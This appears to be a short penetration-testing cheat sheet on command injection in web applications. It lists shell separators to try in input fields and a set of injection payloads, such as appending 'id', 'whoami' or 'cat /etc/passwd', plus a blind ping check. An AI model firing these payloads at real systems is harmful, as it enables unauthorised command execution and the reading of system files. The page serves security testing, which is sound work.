Links

Command injection

Command injection occurs when flaws in a web application allow the execution of OS commands. This typically occurs because inputs are not properly sanitized, allowing attackers to change or add to executed commands.
  • To identify potential command injection vulnerabilities, pay particular attention to functionality within web applications that is normally performed by OS commands
  • Use command line symbols in input fields to test for command injection
    • ; (used to separate commands in Bash)
    • |
    • || (second command runs if first fails)
    • &
    • && (second command runs if first succeeds)
    • >
    • >>
  • Be sure to use commands specific to the target OS
    • cat vs. type
    • ping vs. ping -c
    • ls vs. dir

Payloads

command; id
command && whoami
command || ls (or dir depending on OS)
command; cat /etc/passwd
command; type C:\Windows\win.ini
Blind
command; ping -c5 $ipaddress